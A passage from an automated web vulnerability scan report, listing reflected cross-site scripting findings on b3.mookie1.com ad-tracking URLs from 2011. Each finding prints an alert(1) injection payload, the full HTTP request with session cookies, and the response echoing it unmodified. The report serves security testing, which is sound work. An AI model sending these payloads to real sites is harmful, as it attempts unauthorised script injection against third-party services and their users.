var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.217. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95370'-alert(1)-'16464f5c3e2 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis95370'-alert(1)-'16464f5c3e2&_RM_HTML_referer_=&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
d does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis95370'-alert(1)-'16464f5c3e2&_RM_HTML_referer_=&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
...[SNIP]...

1.218. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378d8'-alert(1)-'1779219b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work&378d8'-alert(1)-'1779219b445=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1990
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
t = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work&378d8'-alert(1)-'1779219b445=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.219. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e906'-alert(1)-'15f7fed6a06 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers8e906'-alert(1)-'15f7fed6a06&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2002
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers8e906'-alert(1)-'15f7fed6a06&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
...[SNIP]...

1.220. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9668"><script>alert(1)</script>c9cd2de7ffb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisd9668"><script>alert(1)</script>c9cd2de7ffb/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisd9668"><script>alert(1)</script>c9cd2de7ffb/992221300/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.221. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52de"><script>alert(1)</script>40ef45181c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1642511786@x54c52de"><script>alert(1)</script>40ef45181c9?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/411138590/x54c52de"><script>alert(1)</script>40ef45181c9/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.222. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 816a5'-alert(1)-'53aad69be5 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers816a5'-alert(1)-'53aad69be5 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2001
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
*/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers816a5'-alert(1)-'53aad69be5';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.223. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a15d'-alert(1)-'2e6fbc1a827 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=9a15d'-alert(1)-'2e6fbc1a827&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2002
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=9a15d'-alert(1)-'2e6fbc1a827&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.224. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0674'-alert(1)-'57a35b63504 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxisc0674'-alert(1)-'57a35b63504&_RM_HTML_referer_=&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2058
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxisc0674'-alert(1)-'57a35b63504&_RM_HTML_referer_=&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='
...[SNIP]...

1.225. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1642511786@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b22a6'-alert(1)-'bc79ebd3a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1642511786@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers&b22a6'-alert(1)-'bc79ebd3a56=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2005
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=&Section=Careers&b22a6'-alert(1)-'bc79ebd3a56=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.226. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f9a2'-alert(1)-'74d2ea460c9 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work5f9a2'-alert(1)-'74d2ea460c9&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2016
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
xternal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/work5f9a2'-alert(1)-'74d2ea460c9&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migC
...[SNIP]...

1.227. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e707e"><script>alert(1)</script>f283c89a9b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxise707e"><script>alert(1)</script>f283c89a9b8/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxise707e"><script>alert(1)</script>f283c89a9b8/2125846413/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.228. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b9c"><script>alert(1)</script>1329fd159c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1662816311@x5487b9c"><script>alert(1)</script>1329fd159c6?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
